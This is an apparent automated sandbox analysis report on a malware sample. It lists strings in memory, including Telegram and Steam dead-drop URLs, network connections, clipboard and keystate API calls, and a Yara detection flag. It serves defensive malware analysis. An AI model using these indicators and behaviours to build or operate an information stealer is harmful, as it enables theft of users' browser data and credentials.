                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Inf.com, 0000000D.00000003.2418174745.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418149461.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418413871.00000000044E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Inf.com, 0000000D.00000003.2418174745.0000000004478000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418149461.00000000044FF000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418413871.00000000044E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044EA000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3268617637.00000000000F1000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418604420.00000000044E8000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3274095484.00000000014E6000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418255884.0000000004469000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3268617637.000000000013D000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418297625.0000000001505000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000003.2418561056.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael$
                Source: Inf.com, 0000000D.00000002.3276645001.0000000004460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Inf.com, 0000000D.00000002.3277051984.00000000044EA000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3268617637.000000000013D000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Subtle.9.dr, Inf.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Inf.com, 0000000D.00000002.3279538912.0000000004741000.00000004.00000800.00020000.00000000.sdmp, Inf.com, 0000000D.00000002.3277634519.0000000004605000.00000004.00000800.00020000.00000000.sdmp, LNOHDB.13.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmp, 0ZC2DB.13.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000011.00000002.2697276538.000051D800C10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2609596103.000051D800C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: Inf.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 00000011.00000003.2630638238.000051D800294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000011.00000003.2611828132.000051D800D40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695161383.000051D800654000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000011.00000002.2696611983.000051D800A0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharPk3
                Source: chrome.exe, 00000011.00000002.2697217064.000051D800BD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/CharQ
                Source: chrome.exe, 00000011.00000002.2697452538.000051D800C84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000011.00000002.2698418581.000051D800E7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content.js.27.dr, content_new.js.27.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000011.00000002.2698312359.000051D800E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696190907.000051D8008F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000011.00000002.2698312359.000051D800E30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2693776369.000051D8001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696190907.000051D8008F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695498959.000051D800740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: Inf.com, 0000000D.00000002.3277634519.00000000045E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694719675.000051D80050C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695062193.000051D80060C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 0ZC2DB.13.dr, D2DTJM.13.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000011.00000002.2697067299.000051D800B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoQ
                Source: chrome.exe, 00000011.00000002.2694476137.000051D800424000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000011.00000003.2618170710.000051D80100C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000011.00000002.2696504993.000051D8009BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000011.00000003.2630638238.000051D800294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000011.00000002.2692880330.000051D80000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000011.00000003.2646589128.000051D8024B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000011.00000003.2641786183.000051D80220C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000011.00000002.2693836696.000051D80020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000011.00000003.2659699616.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698393314.000051D800E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2633307189.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655794275.000051D800E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000011.00000003.2659699616.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698393314.000051D800E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2633307189.000051D800E68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655794275.000051D800E6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.om
                Source: chrome.exe, 00000011.00000002.2694450601.000051D800418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000011.00000002.2694632243.000051D8004D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000011.00000002.2702850314.000051D802AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2654763634.000051D802B24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655078399.000051D802A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655120352.000051D802A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654502382.000051D802A7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2655159315.000051D802B60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654990783.000051D802AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2702850314.000051D802AD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000011.00000003.2655020242.000051D802AB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2654594591.000051D802B34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                Source: Inf.com, 0000000D.00000002.3282318850.00000000065FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: chrome.exe, 00000011.00000002.2697486285.000051D800CA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000011.00000002.2699819467.000051D8013E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2635630335.000051D8013E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcaogl
                Source: chrome.exe, 00000011.00000002.2696868366.000051D800AB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytcap
                Source: chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2695591525.000051D80079B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000002.2697911899.000051D800D5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: chrome.exe, 00000011.00000002.2699160374.000051D801148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlault
                Source: chrome.exe, 00000011.00000002.2698496579.000051D800E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmllt
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
                Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.5:49756 version: TLS 1.2
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,13_2_00A8F7C7
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00A8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00A8F55C
                Source: C:\Users\user\Desktop\lem.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.comCode function: 13_2_00AA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00AA9FD2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
